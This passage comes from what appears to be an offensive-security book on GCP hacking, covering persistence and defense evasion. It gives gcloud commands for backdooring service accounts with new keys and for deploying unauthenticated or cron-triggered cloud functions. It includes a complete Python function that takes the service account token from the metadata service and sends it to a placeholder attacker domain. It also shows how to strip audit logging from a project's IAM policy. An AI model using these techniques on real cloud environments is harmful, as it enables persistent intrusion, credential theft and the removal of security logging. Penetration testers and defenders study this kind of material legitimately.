This will generate a lot of output, so you might want to pipe everything to a file you can grep through later.
Persistence
If you get into a target cloud environment you probably want to ensure that you don't lose access. There are several persistence techniques that can be used to backdoor accounts and infrastructure. Note that anywhere I use the gcloud cli it can be swapped out for the Google API or SDK.
Service Account Keys
There are several ways you can authenticate to GCP and one of them is through service account keys. Service accounts can have multiple keys associated with them, and each one will give you access to GCP as that user.
In the above image we can see that this service account has two keys associated with it. Whoever has these keys will be able to authenticate as that user. Another thing you might have noticed is the expiration date; by default, user created keys are set to never expire. You may recall us creating a service account key in the privilege escalation and lateral movement section; that same technique can be used to backdoor service accounts. I'll be using gcloud to perform this
action, but you can use the same exploit script from Rhino Security Labs to do this as well:
● https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py
If you're using gcloud you can run the following command to create a service account key:
● gcloud iam service-accounts keys create key.json --iam-account=IAM_ACCOUNT
Next, import the key into gcloud and you will be able to interact with GCP as that user. Note that to run this command you will have to have the correct permissions, otherwise you will be denied. If you do have the correct permissions you can backdoor every service account in the project, giving you easy access back into the target cloud environment.
Cloud Function
Cloud functions make great backdoors. All you have to do is create an unauthenticated cloud function whose trigger is an HTTP request. Next you set your cloud function to run your malicious code, such as an OS command, whenever it is called. After that you just have to navigate to the cloud function's URL to execute your OS command. I typically just use curl to hit the metadata service, which pulls down the attached service account's access token. If you don't want to create a new function you can also update an existing cloud function to include your backdoor code.
To use this technique with gcloud just enter the following commands:
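A sketch of the deploy; the function name and source directory are placeholders, and the policy binding is what makes the function callable without authentication:
● gcloud functions deploy backdoor-func --runtime python37 --trigger-http --allow-unauthenticated --source <SOURCE-DIR>
● gcloud functions add-iam-policy-binding backdoor-func --member=allUsers --role=roles/cloudfunctions.invoker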
Note if you don't have permissions to set an IAM policy you won't be able to make the function unauthenticated, which means you will have to be logged in to call the function. In the above example you can tell the function did not end up unauthenticated even though we specified it should be; we can tell this because of the warning it gave us.
Cron Job
If you're familiar with Linux cron jobs, Google Cloud Scheduler is the same thing. It's common for linux malware to use cron jobs for persistence and the same technique can be applied in the cloud.
These cron jobs can be used as triggers for many things, but I'll be using one to send a Pub/Sub message. We can then set up a cloud function that will be triggered whenever it receives a Pub/Sub message. The cloud function can do anything you want, but I'll be using it to steal the attached service account's token. The first step is to create a Pub/Sub topic as shown below. This topic will be used to wire the cron job to the cloud function:
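● gcloud pubsub topics create mytopic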
Next create a cron job; in this example I'll create a cron job that executes every minute. This cron job will post a message to the Pub/Sub topic, ultimately triggering the malicious cloud function.
● gcloud scheduler jobs create pubsub myjob --schedule "* * * * *" --topic mytopic --message-body "Hello"
Finally create the malicious cloud function. This function should be used to do some malicious action; in this example it will send the attacker an authentication token.
● gcloud functions deploy <PYTHON-FUNCTION-NAME> --runtime python37 --trigger-topic=<TOPIC-NAME>
As you can see below, the cloud function's source code is fairly simple. First we hit the metadata service to grab the attached service account's authentication token, then we ship it off to the attacker's server.

import requests

# The function name here is a placeholder; it must match the entry point of the deployed function.
def hello_pubsub(event, context):
    """Triggered by a message on the Pub/Sub topic.
    Args:
        event (dict): the Pub/Sub event payload.
        context: metadata about the triggering event.
    """
    # Grab the attached service account's access token from the metadata service
    r = requests.get(
        url="http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",
        headers={"Metadata-Flavor": "Google"})
    # Exfiltrate the token to the attacker's server as a query parameter
    PARAMS = {"data": r.text}
    requests.get(url="http://<ATTACKER-DOMAIN-HERE>/", params=PARAMS)
Once the cron job runs it will send a message to the Pub/Sub topic. The malicious cloud function listening on this topic will trigger, grab the attached service account's token, and send it to the attacker. Cron jobs have been used as a persistence technique for years, and we can use the same trick in the cloud.
Defense Evasion
Audit Logs
Cloud Audit Logs helps security teams maintain audit trails in Google Cloud Platform (GCP). If enabled, this will log Admin read, Data read, and/or Data write operations for the specified services and APIs. To get a list of services that have audit logging enabled, pull down the project's IAM policy, which contains the audit configs:
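● gcloud projects get-iam-policy <PROJECT-ID>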
As you can see in the above image this project has Admin read, Data read, and Data write logging enabled on all services. Anything and everything we do on the platform is being logged.
To remove this logging we will need the ability to set an iam-policy on the project. This level of permission will require a super admin account (owner) or someone with the ability to set an iam policy, which is typically not given out. However, if you do happen to have the right permissions, all you have to do is delete the audit config section of the policy file and push the edited policy back up, as sketched below.
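A rough workflow; the file name is arbitrary:
● gcloud projects get-iam-policy <PROJECT-ID> > IAM-POLICY.YAML
● nano IAM-POLICY.YAML (delete the auditConfigs section)
● gcloud projects set-iam-policy <PROJECT-ID> IAM-POLICY.YAML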
Conclusion
AWS hacking is very popular, but GCP hacking gets far less attention. The information covered in this chapter should equip you with the necessary knowledge to take on the vast majority of GCP environments. You know the most popular initial
compromise methods, you know how to escalate privileges, you know what services
have juicy information, and you know how to persist in a GCP cloud environment.
Summary
Cloud hacking is a huge topic and we have only scratched the surface. However, if you completed this book you are off to a really good start and will be better equipped than 95% of the people out there. If you want to hack the cloud you must first understand the technology stack.
At a high level cloud hacking follows the same steps everywhere, but at a technical level things look fairly different. You learned that these high level steps are initial access, privilege escalation, enumeration, persistence, and defense evasion. At the technical level you should have the skills necessary to deal with kubernetes, AWS, and GCP environments. There are still other things I didn't have time to cover, such as Azure, Alibaba, Yandex Cloud, microservices, SAAS platforms, and a bunch of other cloud hacking topics; I'll have to save those for another time.
Twitter: https://twitter.com/ghostlulz1337
Website: http://ghostlulz.com